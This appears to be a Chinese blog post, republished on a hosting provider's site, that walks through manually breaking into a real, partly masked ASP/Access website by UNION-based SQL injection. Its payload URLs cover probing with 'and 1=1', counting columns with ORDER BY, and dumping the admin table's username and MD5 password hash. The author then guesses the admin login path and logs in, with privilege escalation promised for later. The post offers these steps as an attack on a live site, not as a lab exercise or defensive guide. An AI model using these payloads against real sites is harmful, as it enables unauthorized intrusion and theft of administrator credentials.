温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

【实战】利用联合查询--手工SQL注入拿下网站

发布时间:2020-07-16 06:49:45 来源:网络 阅读:1732 作者:CircleAgain 栏目:安全技术

        看到很多脚本小子,工具党用啊D,明小子,穿山甲对网站扫来扫去,拿个后台什么的,其实基础是最重要的,今天我来说一下纯手工注入一个站点。

 

目标网址:http://www.******.com/about.asp?id=1

 

1.首先确认这里是否存在整型注入,很简单,url后加' and 1=1 and 1=2,不细说。同时我们还判断出这是Access的数据库。

【实战】利用联合查询--手工SQL注入拿下网站

 

2.利用order by判断表项有几个;

    http://www.******.com/about.asp?id=1 order by 4(这里的5报错,4正确,就是4个了)

 

3.然后测试显示位,2,3位可显;

    http://www.******.com/about.asp?id=1 and 1=2 union select 1,2,3,4 from admin

【实战】利用联合查询--手工SQL注入拿下网站

 

4.在显示位猜测字段值;这里的表名,字段名根据经验来试;常见的就那几种;我们得到了用户名和密码(MD5加密的);

    http://www.******.com/about.asp?id=1 and 1=2 union select 1,username,3,4 from admin
    http://www.******.com/about.asp?id=1 and 1=2 union select 1,password,3,4 from admin

【实战】利用联合查询--手工SQL注入拿下网站

【实战】利用联合查询--手工SQL注入拿下网站

 

5.拿到用户名密码后,寻找后台,常见的admin/login/manager/admin_login等可以试一试,成功登陆,搞定。提权后面再说咯。

【实战】利用联合查询--手工SQL注入拿下网站

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI